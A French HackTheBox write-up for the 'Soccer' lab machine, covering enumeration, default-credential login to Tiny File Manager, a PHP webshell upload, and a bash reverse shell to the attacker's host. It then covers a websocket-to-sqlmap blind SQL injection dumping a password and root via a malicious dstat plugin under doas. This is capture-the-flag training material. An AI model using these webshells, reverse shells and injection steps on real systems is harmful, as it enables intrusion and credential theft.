Catégories
HackTheBox Machines

HTB{Soccer}

Bonjour à tous, aujourd’hui, une box Linux facile appelée Soccer.

Comme d’habitude, on commence par un nmap.

nmap -p- --min-rate 10000 10.10.11.194
Starting Nmap 7.80 ( https://nmap.org ) at 2023-06-04 13:32 EDT
Nmap scan report for 10.10.11.194
Host is up (0.093s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9091/tcp open  xmltec-xmlmail

Nous avons donc 3 ports :

• un port SSH

• un port HTTP

• et un port 9091 identifié comme xlmtec-xmlmail

Le site web nous redirige vers soccer.htb.

Nous commençons par faire du brute force de sous-domaine via ffuf.

fuf -u http://10.10.11.194 -H "Host: FUZZ.soccer.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -ac

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.194
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.soccer.htb
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: all
________________________________________________

:: Progress: [19966/19966] :: Job [1/1] :: 427 req/sec :: Duration: [0:00:47] :: Errors: 0 ::

Nous n’avons aucun retour.

Nous allons donc brute-forcer les dossiers et fichiers cette fois-ci.

feroxbuster -u http://soccer.htb

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.9.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://soccer.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.9.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        7l       12w      162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        7l       10w      162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      711l     4253w   403502c http://soccer.htb/ground2.jpg
200      GET     2232l     4070w   223875c http://soccer.htb/ground4.jpg
200      GET      809l     5093w   490253c http://soccer.htb/ground1.jpg
200      GET      494l     1440w    96128c http://soccer.htb/ground3.jpg
200      GET      147l      526w     6917c http://soccer.htb/
301      GET        7l       12w      178c http://soccer.htb/tiny => http://soccer.htb/tiny/
301      GET        7l       12w      178c http://soccer.htb/tiny/uploads => http://soccer.htb/tiny/uploads/
[####################] - 1m     90021/90021   0s      found:7       errors:0      
[####################] - 57s    30000/30000   521/s   http://soccer.htb/ 
[####################] - 56s    30000/30000   526/s   http://soccer.htb/tiny/ 
[####################] - 56s    30000/30000   528/s   http://soccer.htb/tiny/uploads/ 

Nous trouvons un dossier nommé “tiny”. C’est une instance de Tiny File Manager.

TinyFileManager est un gestionnaire de fichiers PHP basé sur le web. Il s’agit d’une application web simple, rapide et de petite taille en un seul fichier PHP qui peut être déposé dans n’importe quel dossier sur votre serveur, prête à être utilisée en plusieurs langues pour stocker, télécharger, éditer et gérer des fichiers et des dossiers en ligne via un navigateur web.

L’application fonctionne sur PHP 5.5+, elle permet la création de plusieurs utilisateurs et chaque utilisateur peut avoir son propre répertoire et un support intégré pour la gestion des fichiers texte avec cloud9 IDE et elle supporte la coloration syntaxique pour plus de 150+ langues et plus de 35+ thèmes.

Le fichier README de github nous donne les instructions suivantes pour configurer Tiny File Manager :

Téléchargez le ZIP contenant la dernière version de la branche master.
Copiez le fichier tinyfilemanager.php sur votre espace web – c’est tout 🙂 Vous pouvez également changer le nom du fichier « tinyfilemanager.php » en quelque chose d’autre, vous voyez ce que je veux dire.
Nom d’utilisateur/mot de passe par défaut : admin/admin@123 et user/12345.
Attention : Veuillez définir vos propres nom d’utilisateur et mot de passe dans $auth_users avant utilisation. Le mot de passe est chiffré avec password_hash(). pour générer un nouveau hash de mot de passe, cliquez ici.
Pour activer/désactiver l’authentification, mettez $use_auth à true ou false.
Ajoutez votre propre fichier de configuration config.php dans le même dossier pour l’utiliser comme fichier de configuration supplémentaire.
Pour travailler hors ligne sans ressources CDN, utilisez la branche hors ligne

Nous avons ici deux identifiants disponible,

  • « admin » / « admin@123 » et
  • « user » / « 12345 ».

Les deux jeux d’identifiants fonctionnent ici. Nous allons donc nous connecter en tant qu’administrateur.

Une fois connecté, la page affiche les fichiers qui font partie du site web du Soccer :

Nous pouvons uploader un fichier dans tiny/uploads

Nous creons ainsi un simple webshell PHP que nous uploadons dans tiny/uploads et le webshell execute bien du code.

<?php system($_REQUEST["cmd"]); ?>
curl http://soccer.htb/tiny/uploads/cmd.php -d 'cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Nous lancons nc en écoute sur 443 sur mon hôte, et nous déclenchons un reverse shell en envoyant un reverse shell bash :

curl http://soccer.htb/tiny/uploads/cmd.php -d 'cmd=bash -c "bash -i >%26 /dev/tcp/10.10.14.6/443 0>%261"'
nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.194 55140
bash: cannot set terminal process group (1048): Inappropriate ioctl for device
bash: no job control in this shell
www-data@soccer:~/html/tiny/uploads$ 

Maintenant que nous avons un pied dans la machine, il est temps d’énumérer pour élever nos privilèges.

Via linpeas, nous trouvons dans le fichier /etc/hosts un autre nom de domaine, soc-player.soccer.htb.

Le site ressemble exactement à l’autre, excepté qu’il y a d’autres options dans la barre de menu.

Il est mentionné sur la page de match que nous pouvons avoir un ticket gratuit si nous nous inscrivons.

Nous nous inscrivons donc sur le site.

Aprés l’inscription, nous somme redirigé vers /check, ou j’ai un ticket id.

Je peux entré un id de ticket dans le champ.

Lorsque l’on regarde plus attentivement via le navigateur les requetes envoyé. Nous voyons qu’il effectue une requete sur le port 9091 avec un status 101.

le code 101 est une repose de changement de protocole.

Le port 9091 est un serveur websocket.
Aprés des recherches, j’ai trouvé ceci.
https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html

Nous modifions légérement le code et lançons sqlmap.

from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import unquote, urlparse
from websocket import create_connection

ws_server = "ws://soc-player.soccer.htb:9091/"

def send_ws(payload):
	ws = create_connection(ws_server)
	# If the server returns a response on connect, use below line	
	#resp = ws.recv() # If server returns something like a token on connect you can find and extract from here
	
	# For our case, format the payload in JSON
	message = unquote(payload).replace('"','\'') # replacing " with ' to avoid breaking JSON structure
	data = '{"id":"%s"}' % message

	ws.send(data)
	resp = ws.recv()
	ws.close()

	if resp:
		return resp
	else:
		return ''

def middleware_server(host_port,content_type="text/plain"):

	class CustomHandler(SimpleHTTPRequestHandler):
		def do_GET(self) -> None:
			self.send_response(200)
			try:
				payload = urlparse(self.path).query.split('=',1)[1]
			except IndexError:
				payload = False
				
			if payload:
				content = send_ws(payload)
			else:
				content = 'No parameters specified!'

			self.send_header("Content-type", content_type)
			self.end_headers()
			self.wfile.write(content.encode())
			return

	class _TCPServer(TCPServer):
		allow_reuse_address = True

	httpd = _TCPServer(host_port, CustomHandler)
	httpd.serve_forever()


print("[+] Starting MiddleWare Server")
print("[+] Send payloads in http://localhost:8081/?id=*")

try:
	middleware_server(('0.0.0.0',8081))
except KeyboardInterrupt:
	pass
sqlmap -u "http://localhost:8081/?id=1"
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.6.7#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:08:52 /2022-12-19/

[15:08:52] [INFO] testing connection to the target URL
[15:08:52] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.9.0')
[15:08:52] [INFO] checking if the target is protected by some kind of WAF/IPS
[15:08:52] [INFO] testing if the target URL content is stable
[15:08:52] [INFO] target URL content is stable
[15:08:52] [INFO] testing if GET parameter 'id' is dynamic
[15:08:52] [WARNING] GET parameter 'id' does not appear to be dynamic
[15:08:53] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[15:08:53] [INFO] testing for SQL injection on GET parameter 'id'
[15:08:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:08:53] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:08:53] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[15:08:53] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[15:08:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[15:08:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[15:08:55] [INFO] testing 'Generic inline queries'
[15:08:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[15:08:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[15:08:55] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[15:08:55] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:09:06] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
[15:09:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:09:10] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:09:11] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] 
[15:09:21] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') 
[15:09:21] [INFO] checking if the injection point on GET parameter 'id' is a false positive

sqlmap identified the following injection point(s) with a total of 97 HTTP(s) requests:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 1962 FROM (SELECT(SLEEP(5)))qvRg)
---
[15:10:20] [INFO] the back-end DBMS is MySQL
[15:10:20] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
back-end DBMS: MySQL >= 5.0.12
[15:10:20] [INFO] fetched data logged to text files under '/home/selim/.local/share/sqlmap/output/localhost'

[*] ending @ 15:10:20 /2022-12-19/

❯ sqlmap -u "http://localhost:8081/?id=1" --dbs
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.6.7#stable}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:10:23 /2022-12-19/

[15:10:23] [INFO] resuming back-end DBMS 'mysql' 
[15:10:23] [INFO] testing connection to the target URL
[15:10:23] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.9.0')
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 1962 FROM (SELECT(SLEEP(5)))qvRg)
---
[15:10:23] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[15:10:23] [INFO] fetching database names
[15:10:23] [INFO] fetching number of databases
[15:10:23] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)                                   
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] 
[15:10:32] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
5
[15:10:37] [INFO] retrieved: 
[15:10:42] [INFO] adjusting time delay to 1 second due to good response times
mysql
[15:11:02] [INFO] retrieved: information_schema
[15:12:12] [INFO] retrieved: performance_s
[15:13:11] [ERROR] invalid character detected. retrying..
[15:13:11] [WARNING] increasing time delay to 2 seconds
chema
[15:13:38] [INFO] retrieved: sys
[15:14:01] [INFO] retrieved: soccer_db
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] soccer_db
[*] sys

[15:15:06] [INFO] fetched data logged to text files under '/home/selim/.local/share/sqlmap/output/localhost'

[*] ending @ 15:15:06 /2022-12-19/


╭─      ~/Documents/hackthebox/machine/easy/soccer                                                     ✔  took 4m 44s    10.10.14.131   at 15:15:07   
╰─ sqlmap -u "http://localhost:8081/?id=1" -D soccer_db --tables                                                                        IP A: 172.16.111.130   
❯ sqlmap -u "http://localhost:8081/?id=1" -D soccer_db --tables
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6.7#stable}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:15:22 /2022-12-19/

[15:15:22] [INFO] resuming back-end DBMS 'mysql' 
[15:15:22] [INFO] testing connection to the target URL
[15:15:22] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.9.0')
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 1962 FROM (SELECT(SLEEP(5)))qvRg)
---
[15:15:22] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[15:15:22] [INFO] fetching tables for database: 'soccer_db'
[15:15:22] [INFO] fetching number of tables for database 'soccer_db'
[15:15:22] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)                                   
[15:15:25] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] 
1
[15:18:15] [INFO] retrieved: 
[15:18:25] [INFO] adjusting time delay to 1 second due to good response times
[15:18:30] [ERROR] invalid character detected. retrying..
[15:18:30] [WARNING] increasing time delay to 2 seconds
accoun
[15:19:15] [ERROR] invalid character detected. retrying..
[15:19:15] [WARNING] increasing time delay to 3 seconds
ts
Database: soccer_db
[1 table]
+----------+
| accounts |
+----------+

[15:19:38] [INFO] fetched data logged to text files under '/home/selim/.local/share/sqlmap/output/localhost'

[*] ending @ 15:19:38 /2022-12-19/


❯ sqlmap -u "http://localhost:8081/?id=1" -D soccer_db -T accounts --dump
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.6.7#stable}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:19:59 /2022-12-19/

[15:19:59] [INFO] resuming back-end DBMS 'mysql' 
[15:19:59] [INFO] testing connection to the target URL
[15:19:59] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.9.0')
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 1962 FROM (SELECT(SLEEP(5)))qvRg)
---
[15:19:59] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[15:19:59] [INFO] fetching columns for table 'accounts' in database 'soccer_db'
[15:19:59] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)                                   
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] 
[15:20:39] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
4
[15:20:39] [INFO] retrieved: 
[15:20:50] [INFO] adjusting time delay to 1 second due to good response times
id
[15:20:56] [INFO] retrieved: email
[15:21:13] [INFO] retrieved: 
[15:21:20] [ERROR] invalid character detected. retrying..
[15:21:20] [WARNING] increasing time delay to 2 seconds
userna
[15:22:07] [ERROR] invalid character detected. retrying..
[15:22:07] [WARNING] increasing time delay to 3 seconds
me
[15:22:25] [INFO] retrieved: passwor
[15:23:52] [ERROR] invalid character detected. retrying..
[15:23:52] [WARNING] increasing time delay to 4 seconds
d
[15:24:05] [INFO] fetching entries for table 'accounts' in database 'soccer_db'
[15:24:05] [INFO] fetching number of entries for table 'accounts' in database 'soccer_db'
[15:24:05] [INFO] retrieved: 1
[15:24:10] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)                          
player@player.htb
[15:28:19] [ERROR] invalid character detected. retrying..
[15:28:19] [WARNING] increasing time delay to 5 seconds

[15:28:19] [INFO] retrieved: 1324
[15:29:18] [INFO] retrieved: PlayerOftheMatch2
[15:34:13] [ERROR] invalid character detected. retrying..
[15:34:13] [WARNING] increasing time delay to 6 seconds
02
[15:34:46] [ERROR] invalid character detected. retrying..
[15:34:46] [WARNING] increasing time delay to 7 seconds
[15:35:02] [ERROR] invalid character detected. retrying..
[15:35:02] [WARNING] increasing time delay to 8 seconds
[15:35:19] [ERROR] invalid character detected. retrying..
[15:35:19] [WARNING] increasing time delay to 9 seconds
2
[15:35:38] [INFO] retrieved: player
Database: soccer_db
Table: accounts
[1 entry]
+------+-------------------+----------------------+----------+
| id   | email             | password             | username |
+------+-------------------+----------------------+----------+
| 1324 | player@player.htb | PlayerOftheMatch2022 | player   |
+------+-------------------+----------------------+----------+

[15:38:34] [INFO] table 'soccer_db.accounts' dumped to CSV file '/home/selim/.local/share/sqlmap/output/localhost/dump/soccer_db/accounts.csv'
[15:38:34] [INFO] fetched data logged to text files under '/home/selim/.local/share/sqlmap/output/localhost'

[*] ending @ 15:38:34 /2022-12-19/

Nous decouvrons le mot de passe de l’utilisateur player. Nous pouvons ainsi switcher sur cette utilisateur.

www-data@soccer:/home/player$ su player -
Password: 
player@soccer:~$

Continuons notre énumération. Nous découvrons que le binaire doas a les droits SUID.

find / -perm -4000 -type f 2>/dev/null

-rwsr-xr-x 1 root root 42K Nov 17 09:09 /usr/local/bin/doas

doas est une alternative à sudo que l’on trouve généralement sur les systèmes d’exploitation OpenBSD, mais qui peut être installée sur les systèmes d’exploitation Linux basés sur Debian comme Ubuntu.

En allant regarder les droits que nous avons éventuellement, nous voyons lque nous pouvons lancé /usr/bin/dstat en root sans mot de passe.

cat /usr/local/etc/doas.conf 
permit nopass player as root cmd /usr/bin/dstat

https://book.hacktricks.xyz/linux-hardening/privilege-escalation#doas

dstat est un outil permettant d’obtenir des informations sur le système. En regardant la page de manuel, il y a une section sur les plugins qui dit :

Bien que tout le monde puisse créer ses propres plugins dstat (et les contribuer), dstat est livré avec un certain nombre de plugins qui étendent considérablement ses capacités.

Tout en bas de la page, il y a une section sur les fichiers :

Chemins pouvant contenir des plugins dstat_*.py externes :

~/.dstat/
(path of binary)/plugins/
/usr/share/dstat/
/usr/local/share/dstat/

Nous pouvons ainsi créer un plugin malicieux avec le nom

dstat_[plugin name].py

Nous pouvons ainsi créé un plugin python trés simple.

import os

os.system("/bin/bash")

Par chance, /usr/local/share/dstat est écrivable.
Nous plaçons donc notre plugin à l’intérieur de celui ci.

echo -e 'import os\n\nos.system("/bin/bash")' > /usr/local/share/dstat/dstat_0xdf.py

Et nous lançons doas.

player@soccer:~$ doas /usr/bin/dstat --0xdf
/usr/bin/dstat:2619: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
  import imp
root@soccer:/home/player#

Et voila nous sommes root.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *